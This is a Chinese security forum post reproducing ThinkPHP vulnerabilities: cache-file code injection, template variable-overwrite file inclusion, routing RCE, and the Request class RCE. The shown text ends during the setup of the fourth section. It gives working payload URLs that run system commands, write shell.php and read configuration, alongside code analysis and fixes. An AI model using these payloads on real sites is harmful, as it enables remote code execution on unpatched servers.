ThinkPHP漏洞复现

Track-mss   ·   发表于 2021-07-28 14:34:48   ·   CTF&WP专版
<div class="markdown-body editormd-preview-container" previewcontainer="true" style="padding: 20px;"><div class="markdown-toc editormd-markdown-toc"><ul class="markdown-toc-list"><li><a class="toc-level-2" href="#1. ThinkPHP 5.0.10-3.2.3 缓存函数设计缺陷可导致代码执行" level="2">1. ThinkPHP 5.0.10-3.2.3 缓存函数设计缺陷可导致代码执行</a><ul><li><a class="toc-level-3" href="#0x00 背景" level="3">0x00 背景</a></li><li><a class="toc-level-3" href="#0x01 实验环境" level="3">0x01 实验环境</a></li><li><a class="toc-level-3" href="#0x02 漏洞利用" level="3">0x02 漏洞利用</a></li><li><a class="toc-level-3" href="#0x03 漏洞分析" level="3">0x03 漏洞分析</a></li><li><a class="toc-level-3" href="#0x04 修复方案" level="3">0x04 修复方案</a></li><li><a class="toc-level-3" href="#0x05 参考资料" level="3">0x05 参考资料</a></li></ul></li><li><a class="toc-level-2" href="#2. ThinkPHP 5.x 变量覆盖导致的文件包含&amp;任意代码执行" level="2">2. ThinkPHP 5.x 变量覆盖导致的文件包含&amp;任意代码执行</a><ul><li><a class="toc-level-3" href="#0x00 背景" level="3">0x00 背景</a></li><li><a class="toc-level-3" href="#0x01 漏洞复现" level="3">0x01 漏洞复现</a></li><li><a class="toc-level-3" href="#0x02 漏洞分析" level="3">0x02 漏洞分析</a></li><li><a class="toc-level-3" href="#0x03 漏洞修复" level="3">0x03 漏洞修复</a></li><li><a class="toc-level-3" href="#0x04 参考资料" level="3">0x04 参考资料</a></li></ul></li><li><a class="toc-level-2" href="#3. ThinkPHP 5.0.x 未开启强制路由导致的RCE 漏洞分析" level="2">3. ThinkPHP 5.0.x 未开启强制路由导致的RCE 漏洞分析</a><ul><li><a class="toc-level-3" href="#0x00 背景" level="3">0x00 背景</a></li><li><a class="toc-level-3" href="#0x01 漏洞复现" level="3">0x01 漏洞复现</a></li><li><a class="toc-level-3" href="#0x02 漏洞分析" level="3">0x02 漏洞分析</a></li><li><a class="toc-level-3" href="#0x03 漏洞修复" level="3">0x03 漏洞修复</a></li><li><a class="toc-level-3" href="#0x04 参考资料" level="3">0x04 参考资料</a></li></ul></li><li><a class="toc-level-2" href="#4. ThinkPHP 5 核心类 Request 远程代码漏洞分析" level="2">4. ThinkPHP 5 核心类 Request 远程代码漏洞分析</a><ul><li><a class="toc-level-3" href="#0x00 背景" level="3">0x00 背景</a></li><li><a class="toc-level-3" href="#0x01 漏洞复现" level="3">0x01 漏洞复现</a></li><li><a class="toc-level-3" href="#0x02 漏洞分析" level="3">0x02 漏洞分析</a></li><li><a class="toc-level-3" href="#0x03 漏洞修复" level="3">0x03 漏洞修复</a></li><li><a class="toc-level-3" href="#0x04 参考资料" level="3">0x04 参考资料</a></li></ul></li><li><a class="toc-level-2" href="#5. ThinkPHP v6.0.0-v6.0.1任意文件写漏洞分析" level="2">5. ThinkPHP v6.0.0-v6.0.1任意文件写漏洞分析</a><ul><li><a class="toc-level-3" href="#0x00 背景" level="3">0x00 背景</a></li><li><a class="toc-level-3" href="#0x01 漏洞利用" level="3">0x01 漏洞利用</a></li><li><a class="toc-level-3" href="#0x02 漏洞分析" level="3">0x02 漏洞分析</a></li><li><a class="toc-level-3" href="#0x03 漏洞修复" level="3">0x03 漏洞修复</a></li><li><a class="toc-level-3" href="#0x04 总结" level="3">0x04 总结</a></li><li><a class="toc-level-3" href="#0x05 参考资料" level="3">0x05 参考资料</a></li></ul></li><li><a class="toc-level-2" href="#6.ThinkPHP3.2.x RCE 漏洞复现" level="2">6.ThinkPHP3.2.x RCE 漏洞复现</a><ul><li><a class="toc-level-3" href="#0x01 简介" level="3">0x01 简介</a></li><li><a class="toc-level-3" href="#0x02 漏洞概述" level="3">0x02 漏洞概述</a></li><li><a class="toc-level-3" href="#0x03 影响版本" level="3">0x03 影响版本</a></li><li><a class="toc-level-3" href="#0x04 复现" level="3">0x04 复现</a><ul></ul></li></ul></li></ul></div><h2 id="h2-1-thinkphp-5-0-10-3-2-3-"><a name="1. ThinkPHP 5.0.10-3.2.3 缓存函数设计缺陷可导致代码执行" class="reference-link"></a><span class="header-link octicon octicon-link"></span>1. ThinkPHP 5.0.10-3.2.3 缓存函数设计缺陷可导致代码执行</h2><h3 id="h3-0x00-"><a name="0x00 背景" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x00 背景</h3><p>网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。而Thinkphp 在使用缓存的时候是将数据序列化，然后存进一个 php 文件中，这使得命令执行等行为成为可能。</p>
<h3 id="h3-0x01-"><a name="0x01 实验环境" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x01 实验环境</h3><p>系统环境</p>
<p>服务器主机：centOS 7</p>
<p>php 5.4版本，apache2，ThinkPHP 5.0.10</p>
<h3 id="h3-0x02-"><a name="0x02 漏洞利用" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x02 漏洞利用</h3><p>将 <strong>application/index/controller/Index.php</strong> 文件中代码更改如下：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pln"> </span><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln"> </span><span class="kwd">namespace</span><span class="pln"> app\index\controller</span><span class="pun">;</span></code></li><li class="L2"><code class="lang-php"><span class="pln"> </span><span class="kwd">use</span><span class="pln"> think\Cache</span><span class="pun">;</span></code></li><li class="L3"><code class="lang-php"><span class="pln"> </span><span class="kwd">class</span><span class="pln"> </span><span class="typ">Index</span></code></li><li class="L4"><code class="lang-php"><span class="pln"> </span><span class="pun">{</span></code></li><li class="L5"><code class="lang-php"><span class="pln"> </span><span class="kwd">public</span><span class="pln"> </span><span class="kwd">function</span><span class="pln"> index</span><span class="pun">()</span></code></li><li class="L6"><code class="lang-php"><span class="pln"> </span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln"> </span><span class="typ">Cache</span><span class="pun">::</span><span class="kwd">set</span><span class="pun">(</span><span class="str">"name"</span><span class="pun">,</span><span class="pln">input</span><span class="pun">(</span><span class="str">"get.username"</span><span class="pun">));</span></code></li><li class="L8"><code class="lang-php"><span class="pln"> </span><span class="kwd">return</span><span class="pln"> </span><span class="str">'Cache success'</span><span class="pun">;</span></code></li><li class="L9"><code class="lang-php"><span class="pln"> </span><span class="pun">}</span></code></li><li class="L0"><code class="lang-php"><span class="pln"> </span><span class="pun">}</span></code></li></ol></pre>
<p>访问 <code>http://localhost/tpdemo/public/?username=xxx%0d%0aphpinfo();//</code>，即可将 webshell 等写入缓存文件。<br><img src="https://nc0.cdn.zkaq.cn/md/6508/c3c1f79f95fe682342bb3ef36815f904_59041.png" alt=""><br><img src="https://nc0.cdn.zkaq.cn/md/6508/999d0d725e50b4017f62180ec8014497_34854.png" alt=""></p>
<h3 id="h3-0x03-"><a name="0x03 漏洞分析" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x03 漏洞分析</h3><p>首先，查看缓存调用的方法<br><img src="https://nc0.cdn.zkaq.cn/md/6508/dc86a0e8cdffc559eea75b79b3032970_52876.png" alt=""><br>跟进set方法，可见此处动态实例化了一个类<br><img src="https://nc0.cdn.zkaq.cn/md/6508/f257385941eaee87e82cdf3aedc91c06_54128.png" alt=""><br>从这个代码中我们可以看出来，这里获取外部一个配置的数组然后传<br>进了方法，而默认的cache.type为“File”，这个方法会根据我们的配置数据来动态的调用类执行不同的缓存操作<br><img src="https://nc0.cdn.zkaq.cn/md/6508/612a8244d09d8ad459adaf1e8679c758_68427.png" alt=""><br>查看connect函数，这里通过一系列判断，根据cache.type的值，找到cache驱动为File，对应44行的think\cache\driver\File类。然后在51行进行实例化，并将其return。<br><img src="https://nc0.cdn.zkaq.cn/md/6508/cc49f1b0eb955dfaf2b9db2e7333016f_87244.png" alt=""><br>跟进到file类的set函数，可以看到 data 数据没有经过任何处理，只是序列化后拼接存储在文件中，这里的 $this-&gt;options[‘data_compress’] 变量默认情况下为 false ，所以数据不会经过 gzcompress 函数处理。虽然在序列化数据前面拼接了单行注释符 // ，但是我们可以通过注入换行符绕过该限制。<br><img src="https://nc0.cdn.zkaq.cn/md/6508/611203f7cc38b361048347d67122d716_48367.png" alt=""><br>最后查看一下文件名的生成方法，可以看到文件名是通过调用 getCacheKey 方法获得的。缓存文件的子目录和文件名均和缓存类设置的键有关（如本例中缓存类设置的键为 name ）。程序先获得键名的 md5 值，然后将该 md5 值的前 2 个字符作为缓存子目录，后 30 字符作为缓存文件名。如果应用程序还设置了前缀 $this-&gt;options[‘prefix’] ，那么缓存文件还将多一个上级目录。<br><img src="https://nc0.cdn.zkaq.cn/md/6508/bcd54d3428adfcf40d862d32bcedd689_25221.png" alt=""><br>总结一下，在源码中找到Cache::set(name, value, expire)，其中缓存文件名是跟name相关联的，因此可以看作是一个已知条件。漏洞的关键点就是是否开启缓存，value是否可控。</p>
<h3 id="h3-0x04-"><a name="0x04 修复方案" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x04 修复方案</h3><p>从重现过程可以看出，在缓存文件里攻击者通过换行写入了恶意代码。可以参考引用文章中的修复方法：</p>
<p>1，打开文件：thinkphp\library\think\cache\driver\File.php<br>2，找到：public function set($name, $value, $expire = null) 方法<br>3，添加：$data = str_replace(PHP_EOL, ”, $data); 即去掉换行。</p>
<h3 id="h3-0x05-"><a name="0x05 参考资料" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x05 参考资料</h3><p><a href="https://paper.seebug.org/374/">ThinkPHP 5.0.10-3.2.3 缓存函数设计缺陷可导致 Getshell</a><br><a href="https://www.lsablog.com/networksec/penetration/thinkphp-cache-function-design-defects-getshell-bug-repeat-and-analysis/">Thinkphp缓存函数设计缺陷getshell漏洞重现及分析</a></p>
<h2 id="h2-2-thinkphp-5-x-amp-"><a name="2. ThinkPHP 5.x 变量覆盖导致的文件包含&amp;任意代码执行" class="reference-link"></a><span class="header-link octicon octicon-link"></span>2. ThinkPHP 5.x 变量覆盖导致的文件包含&amp;任意代码执行</h2><h3 id="h3-0x00-"><a name="0x00 背景" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x00 背景</h3><p>影响版本：<strong>5.0.0&lt;=ThinkPHP5&lt;=5.0.18</strong> 、<strong>5.1.0&lt;=ThinkPHP&lt;=5.1.10</strong>。</p>
<p>ThinkPHP在加载模版解析变量时存在变量覆盖的问题，且没有对 <strong>$cacheFile</strong> 进行相应的消毒处理，导致模板文件的路径可以被覆盖，从而导致任意文件包含漏洞的发生。</p>
<h3 id="h3-0x01-"><a name="0x01 漏洞复现" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x01 漏洞复现</h3><p>环境：centOS 7, php 5.4, ThinkPHP 5.0.10</p>
<p>首先将 <code>application/index/controller/Index.php</code> 文件代码设置如下：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code><span class="kwd">namespace</span><span class="pln"> app\index\controller</span><span class="pun">;</span></code></li><li class="L2"><code><span class="kwd">use</span><span class="pln"> think\Controller</span><span class="pun">;</span></code></li><li class="L3"><code><span class="kwd">class</span><span class="pln"> </span><span class="typ">Index</span><span class="pln"> </span><span class="kwd">extends</span><span class="pln"> </span><span class="typ">Controller</span></code></li><li class="L4"><code><span class="pun">{</span></code></li><li class="L5"><code><span class="pln"> </span><span class="kwd">public</span><span class="pln"> </span><span class="kwd">function</span><span class="pln"> index</span><span class="pun">()</span></code></li><li class="L6"><code><span class="pln"> </span><span class="pun">{</span></code></li><li class="L7"><code><span class="pln"> $this</span><span class="pun">-&gt;</span><span class="pln">assign</span><span class="pun">(</span><span class="pln">request</span><span class="pun">()-&gt;</span><span class="kwd">get</span><span class="pun">());</span></code></li><li class="L8"><code><span class="pln"> </span><span class="kwd">return</span><span class="pln"> $this</span><span class="pun">-&gt;</span><span class="pln">fetch</span><span class="pun">();</span><span class="pln"> </span></code></li><li class="L9"><code><span class="pln"> </span><span class="pun">}</span></code></li><li class="L0"><code><span class="pun">}</span></code></li></ol></pre><p>创建 <code>application/index/view/index/index.html</code> 文件，内容随意（没有这个模板文件的话，在渲染时程序会报错），并将图片马 <code>1.jpg</code> 放至 <code>public</code> 目录下（模拟上传图片操作）。接着访问 </p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">http</span><span class="pun">:</span><span class="com">//localhost/tp5_10/public/index.php/index/index?cacheFile=1.jpg</span></code></li></ol></pre><p> 链接，即可触发 <code>文件包含漏洞</code> 。</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/71a2f50a24b6e27a1b7859b8e8ddac1f_43272.png" alt=""></p>
<h3 id="h3-0x02-"><a name="0x02 漏洞分析" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x02 漏洞分析</h3><p> 我们可以查看官方更新的<code>commit</code>记录，发现其改进了模板引擎，其中存在危险函数<code>extract</code>，有可能引发变量覆盖漏洞。</p>
<p> 程序在一开始会调用 <code>"thinkphp\library\think\Controller.php"</code>文件中的 <code>assign</code>方法，并传入 <code>POST</code> 数组数据， <code>assign</code>方法代码如下，其调用了view类中的<code>assign</code>方法：</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/402577de03723d0078fbbd2587730861_24250.png" alt=""></p>
<p> 查看视图类中的assign方法代码，在<code>"thinkphp\library\think\View.php"</code> 文件中。可以看到该方法用 <code>array_merge</code>方法将 POST 数组数据合并到 <code>$this-&gt;data</code>中，代码如下：</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/75d77eaf770645386784cec058b10a85_97352.png" alt=""></p>
<p> 接下来查看fetch方法的代码，该方法用于输出模板内容，代码定义在 <code>"thinkphp\library\think\Controller.php"</code>文件中，该方法同样调用的是视图类中的 fetch 方法，代码如下：</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/0cd662faafb541321a3d614559e54f8d_13225.png" alt=""></p>
<p> 视图类中的fetch方法，这里<code>this-&gt;data</code>可控，程序调用fetch方法加载模板输出。在默认情况下 <code>$method</code>的值为 fetch ，也就是说调用了视图引擎中的 fetch 方法，该方法在<code>"thinkphp\library\think\view\driver\Think.php"</code> 文件中，这里如果我们没有指定模板名称，其会使用默认的文件作为模板，模板路径类似<code>当前模块/默认视图目录/当前控制器（小写）/当前操作（小写）.html</code>，如果默认路径模板不存在，程序就会报错。</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/253122b45e56013a85111c6a4846b4ef_68328.png" alt=""></p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/7915ac0ed6d237ee996ad4dffcd03197_29736.png" alt=""></p>
<p>我们跟进到 Template 类的 fetch 方法，可以发现可控变量 $vars 赋值给<code>$this-&gt;data</code> 并最终传入 File 类的 read 方法。而 read 方法中在使用了 extract 函数后，直接包含了 <code>$cacheFile</code>变量。这里就是漏洞发生的关键原因（可以通过 extract 函数，直接覆盖 <code>$cacheFile</code>变量，因为 extract 函数中的参数 <code>$vars</code>可以由用户控制）。</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/403f8400b1ca134e0a04ed74143bdbfd_73508.png" alt=""></p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/3283119d48a0816f8c75947a17e27023_43341.png" alt=""></p>
<p>如果目标站点开启了 <code>allow_url_include</code> ，攻击者甚至可以执行任意代码。</p>
<h3 id="h3-0x03-"><a name="0x03 漏洞修复" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x03 漏洞修复</h3><p>官方的修复方法是：先将<code>$cacheFile</code>变量存储在<code>$this-&gt;cacheFile</code>中，在使用 extract 函数后，最终 include 的变量是 <code>$this-&gt;cacheFile</code>，这样也就避免了 include 被覆盖后的变量值。</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/9db7ddfbacd3b95b30733258f62272da_82333.png" alt=""></p>
<h3 id="h3-0x04-"><a name="0x04 参考资料" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x04 参考资料</h3><p><a href="https://www.freebuf.com/articles/web/207878.html">ThinkPHP5漏洞分析之文件包含</a></p>
<p><a href="http://www.bubuko.com/infodetail-3516646.html">http://www.bubuko.com/infodetail-3516646.html</a></p>
<h2 id="h2-3-thinkphp-5-0-x-rce-"><a name="3. ThinkPHP 5.0.x 未开启强制路由导致的RCE 漏洞分析" class="reference-link"></a><span class="header-link octicon octicon-link"></span>3. ThinkPHP 5.0.x 未开启强制路由导致的RCE 漏洞分析</h2><h3 id="h3-0x00-"><a name="0x00 背景" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x00 背景</h3><p>影响版本：(ThinkPHP 5.0.5-5.0.22 || 5.1.0-5.1.30) </p>
<p>漏洞编号：CNVD-2018-24942</p>
<p>此漏洞是因为框架对传入的路由参数过滤不严格，导致攻击者可以操作非预期的控制器类来远程执行代码。其中不同版本 <strong>payload</strong> 需稍作调整：</p>
<p><strong>5.1.x</strong> ：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">?</span><span class="pln">s</span><span class="pun">=</span><span class="pln">index</span><span class="pun">/</span><span class="pln">\think\Request</span><span class="pun">/</span><span class="pln">input</span><span class="pun">&amp;</span><span class="pln">filter</span><span class="pun">[]=</span><span class="pln">system</span><span class="pun">&amp;</span><span class="pln">data</span><span class="pun">=</span><span class="pln">pwd</span></code></li><li class="L1"><code><span class="pun">?</span><span class="pln">s</span><span class="pun">=</span><span class="pln">index</span><span class="pun">/</span><span class="pln">\think\view\driver\Php</span><span class="pun">/</span><span class="pln">display</span><span class="pun">&amp;</span><span class="pln">content</span><span class="pun">=&lt;?</span><span class="pln">php phpinfo</span><span class="pun">();?&gt;</span></code></li><li class="L2"><code><span class="pun">?</span><span class="pln">s</span><span class="pun">=</span><span class="pln">index</span><span class="pun">/</span><span class="pln">\think\template\driver\file</span><span class="pun">/</span><span class="pln">write</span><span class="pun">&amp;</span><span class="pln">cacheFile</span><span class="pun">=</span><span class="pln">shell</span><span class="pun">.</span><span class="pln">php</span><span class="pun">&amp;</span><span class="pln">content</span><span class="pun">=&lt;?</span><span class="pln">php phpinfo</span><span class="pun">();?&gt;</span></code></li><li class="L3"><code><span class="pun">?</span><span class="pln">s</span><span class="pun">=</span><span class="pln">index</span><span class="pun">/</span><span class="pln">\think\Container</span><span class="pun">/</span><span class="pln">invokefunction</span><span class="pun">&amp;</span><span class="kwd">function</span><span class="pun">=</span><span class="pln">call_user_func_array</span><span class="pun">&amp;</span><span class="pln">vars</span><span class="pun">[</span><span class="lit">0</span><span class="pun">]=</span><span class="pln">system</span><span class="pun">&amp;</span><span class="pln">vars</span><span class="pun">[</span><span class="lit">1</span><span class="pun">][]=</span><span class="pln">id</span></code></li><li class="L4"><code><span class="pun">?</span><span class="pln">s</span><span class="pun">=</span><span class="pln">index</span><span class="pun">/</span><span class="pln">\think\app</span><span class="pun">/</span><span class="pln">invokefunction</span><span class="pun">&amp;</span><span class="kwd">function</span><span class="pun">=</span><span class="pln">call_user_func_array</span><span class="pun">&amp;</span><span class="pln">vars</span><span class="pun">[</span><span class="lit">0</span><span class="pun">]=</span><span class="pln">system</span><span class="pun">&amp;</span><span class="pln">vars</span><span class="pun">[</span><span class="lit">1</span><span class="pun">][]=</span><span class="pln">id</span></code></li></ol></pre><p><strong>5.0.x</strong> ：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">?</span><span class="pln">s</span><span class="pun">=</span><span class="pln">index</span><span class="pun">/</span><span class="pln">think\config</span><span class="pun">/</span><span class="kwd">get</span><span class="pun">&amp;</span><span class="pln">name</span><span class="pun">=</span><span class="pln">database</span><span class="pun">.</span><span class="pln">username </span><span class="com"># 获取配置信息</span></code></li><li class="L1"><code><span class="pun">?</span><span class="pln">s</span><span class="pun">=</span><span class="pln">index</span><span class="pun">/</span><span class="pln">\think\Lang</span><span class="pun">/</span><span class="pln">load</span><span class="pun">&amp;</span><span class="pln">file</span><span class="pun">=../../</span><span class="pln">test</span><span class="pun">.</span><span class="pln">jpg </span><span class="com"># 包含任意文件</span></code></li><li class="L2"><code><span class="pun">?</span><span class="pln">s</span><span class="pun">=</span><span class="pln">index</span><span class="pun">/</span><span class="pln">\think\Config</span><span class="pun">/</span><span class="pln">load</span><span class="pun">&amp;</span><span class="pln">file</span><span class="pun">=../../</span><span class="pln">t</span><span class="pun">.</span><span class="pln">php </span><span class="com"># 包含任意.php文件</span></code></li><li class="L3"><code><span class="pun">?</span><span class="pln">s</span><span class="pun">=</span><span class="pln">index</span><span class="pun">/</span><span class="pln">\think\app</span><span class="pun">/</span><span class="pln">invokefunction</span><span class="pun">&amp;</span><span class="kwd">function</span><span class="pun">=</span><span class="pln">call_user_func_array</span><span class="pun">&amp;</span><span class="pln">vars</span><span class="pun">[</span><span class="lit">0</span><span class="pun">]=</span><span class="pln">system</span><span class="pun">&amp;</span><span class="pln">vars</span><span class="pun">[</span><span class="lit">1</span><span class="pun">][]=</span><span class="pln">id</span></code></li></ol></pre><p>本文是针对ThinkPHP v5.1.x版本的漏洞分析，v5.0.x版本会稍有不同。</p>
<h3 id="h3-0x01-"><a name="0x01 漏洞复现" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x01 漏洞复现</h3><p>此处的实验环境为centOS 7，php 5.4，<strong>thinkphp 5.1.29</strong></p>
<p>通过给出的POC直接访问url即能触发漏洞</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/2aa70c2ded5e309390c529065a3ffa9a_48395.png" alt=""></p>
<h3 id="h3-0x02-"><a name="0x02 漏洞分析" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x02 漏洞分析</h3><p>首先，默认情况下安装的 ThinkPHP 没有开启强制路由选项，而且默认开启路由兼容模式。</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/06b5e3b74609fce8e06b6e56e7704872_62729.png" alt=""></p>
<p>由于没有开启强制路由，说明我们可以使用路由兼容模式 <strong>s</strong> 参数，而框架对控制器名没有进行足够的检测，说明可能可以调用任意的控制器，那么我们可以试着利用 <strong><a href="http://site/?s=模块/控制器/方法">http://site/?s=模块/控制器/方法</a></strong> 来测试。我们知道所有用户参数都会经过 <strong>Request</strong> 类的 <strong>input</strong> 方法处理，该方法会调用 <strong>filterValue</strong> 方法，而 <strong>filterValue</strong> 方法中使用了 <strong>call_user_func</strong> ，那么我们就来尝试利用这个方法。访问如下链接：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">http</span><span class="pun">:</span><span class="com">//localhost/?s=index/think\config/get&amp;name=database.username # 获取配置信息</span></code></li></ol></pre><p>会发现可以成功执行命令。接下来，我们直接在官方修改的 <strong>$controller</strong> 代码段打下断点。我们可以看到控制器的名字是从 <strong>$result</strong> 中获取的，而 <strong>$result</strong> 的值来源于兼容模式下的 <strong>pathinfo</strong> ，即 <strong>s</strong> 参数。</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/856e97fe8ff106c17c4c6d8bf306a866_84302.png" alt=""></p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/85dcfaf1c65b3778ccbefb5dc7f194f7_32900.png" alt=""></p>
<p>接着程序会跳回 <strong>App</strong> 类的 <strong>run</strong> 方法，进而调用 <strong>Dispatch</strong> 类的 <strong>run</strong> 方法，该方法会调用关键函数 <strong>exec</strong> ，我们跟进。</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/fd414204b61db713e5179fc6357b4964_53512.png" alt=""></p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/db1387a7ae8c066a21fe8d5e0d95efcd_96930.png" alt=""></p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/0f2b2fb111bb68ffda3efc45933ee4fe_82127.png" alt=""></p>
<p>在 <strong>exec</strong> 函数中，程序利用反射机制，调用类的方法。这里的类、方法、参数均是我们可以控制的。而且整个过程，并没有看到程序对控制器名的合法性进行检测，这也是导致 <strong>远程代码执行漏洞</strong> 的直接原因。</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/1a8d6fb597efd751c62934e06e168cd1_56322.png" alt=""></p>
<p>以上便是本漏洞的分析。综上，由于Windows的原因，所以有一些payload在windows的主机上是不可以利用的。</p>
<p>那么哪些payload是可以兼容多个平台呢？</p>
<p>由于windows自动加载类加载不到想要的类文件，所以能够下手的就是在框架加载的时候已经加载的类。</p>
<p>5.1是下面这些：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">think\Loader </span></code></li><li class="L1"><code><span class="typ">Composer</span><span class="pln">\Autoload\ComposerStaticInit289837ff5d5ea8a00f5cc97a07c04561</span></code></li><li class="L2"><code><span class="pln">think\Error </span></code></li><li class="L3"><code><span class="pln">think\Container</span></code></li><li class="L4"><code><span class="pln">think\App </span></code></li><li class="L5"><code><span class="pln">think\Env </span></code></li><li class="L6"><code><span class="pln">think\Config </span></code></li><li class="L7"><code><span class="pln">think\Hook </span></code></li><li class="L8"><code><span class="pln">think\Facade</span></code></li><li class="L9"><code><span class="pln">think\facade\Env</span></code></li><li class="L0"><code><span class="pln">env</span></code></li><li class="L1"><code><span class="pln">think\Db</span></code></li><li class="L2"><code><span class="pln">think\Lang </span></code></li><li class="L3"><code><span class="pln">think\Request </span></code></li><li class="L4"><code><span class="pln">think\Log </span></code></li><li class="L5"><code><span class="pln">think\log\driver\File</span></code></li><li class="L6"><code><span class="pln">think\facade\Route</span></code></li><li class="L7"><code><span class="pln">route</span></code></li><li class="L8"><code><span class="pln">think\Route </span></code></li><li class="L9"><code><span class="pln">think\route\Rule</span></code></li><li class="L0"><code><span class="pln">think\route\RuleGroup</span></code></li><li class="L1"><code><span class="pln">think\route\Domain</span></code></li><li class="L2"><code><span class="pln">think\route\RuleItem</span></code></li><li class="L3"><code><span class="pln">think\route\RuleName</span></code></li><li class="L4"><code><span class="pln">think\route\Dispatch</span></code></li><li class="L5"><code><span class="pln">think\route\dispatch\Url</span></code></li><li class="L6"><code><span class="pln">think\route\dispatch\Module</span></code></li><li class="L7"><code><span class="pln">think\Middleware</span></code></li><li class="L8"><code><span class="pln">think\Cookie</span></code></li><li class="L9"><code><span class="pln">think\View</span></code></li><li class="L0"><code><span class="pln">think\view\driver\Think</span></code></li><li class="L1"><code><span class="pln">think\Template</span></code></li><li class="L2"><code><span class="pln">think\template\driver\File</span></code></li><li class="L3"><code><span class="pln">think\Session</span></code></li><li class="L4"><code><span class="pln">think\Debug</span></code></li><li class="L5"><code><span class="pln">think\Cache</span></code></li><li class="L6"><code><span class="pln">think\cache\Driver</span></code></li><li class="L7"><code><span class="pln">think\cache\driver\File</span></code></li></ol></pre><p>5.0 的有：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">think\Route</span></code></li><li class="L1"><code><span class="pln">think\Config</span></code></li><li class="L2"><code><span class="pln">think\Error</span></code></li><li class="L3"><code><span class="pln">think\App</span></code></li><li class="L4"><code><span class="pln">think\Request</span></code></li><li class="L5"><code><span class="pln">think\Hook</span></code></li><li class="L6"><code><span class="pln">think\Env</span></code></li><li class="L7"><code><span class="pln">think\Lang</span></code></li><li class="L8"><code><span class="pln">think\Log</span></code></li><li class="L9"><code><span class="pln">think\Loader</span></code></li></ol></pre><p>两个版本公有的是：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">think\Route </span></code></li><li class="L1"><code><span class="pln">think\Loader </span></code></li><li class="L2"><code><span class="pln">think\Error </span></code></li><li class="L3"><code><span class="pln">think\App </span></code></li><li class="L4"><code><span class="pln">think\Env </span></code></li><li class="L5"><code><span class="pln">think\Config </span></code></li><li class="L6"><code><span class="pln">think\Hook </span></code></li><li class="L7"><code><span class="pln">think\Lang </span></code></li><li class="L8"><code><span class="pln">think\Request </span></code></li><li class="L9"><code><span class="pln">think\Log</span></code></li></ol></pre><h3 id="h3-0x03-"><a name="0x03 漏洞修复" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x03 漏洞修复</h3><p>参考官方文档或直接升级框架版本</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/03124f56c1c1e04a84482bc3e38e2983_40877.png" alt=""></p>
<h3 id="h3-0x04-"><a name="0x04 参考资料" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x04 参考资料</h3><p><a href="https://xz.aliyun.com/t/3570">https://xz.aliyun.com/t/3570</a></p>
<h2 id="h2-4-thinkphp-5-request-"><a name="4. ThinkPHP 5 核心类 Request 远程代码漏洞分析" class="reference-link"></a><span class="header-link octicon octicon-link"></span>4. ThinkPHP 5 核心类 Request 远程代码漏洞分析</h2><h3 id="h3-0x00-"><a name="0x00 背景" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x00 背景</h3><p> Thinphp团队在实现框架中的核心类Requests的method方法实现了表单请求类型伪装，默认为$_POST[‘_method’]变量，却没有对$_POST[‘_method’]属性进行严格校验，可以通过变量覆盖掉Requets类的属性并结合框架特性实现对任意函数的调用达到任意代码执行的效果。</p>
<p> 影响版本：ThinkPHP 5.0.x ~ 5.0.23 ThinkPHP 5.1.x ~ 5.1.31 ThinkPHP 5.2.0beta1</p>
<h3 id="h3-0x01-"><a name="0x01 漏洞复现" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x01 漏洞复现</h3><p>开启调试模式，位置为application/config.php</p>
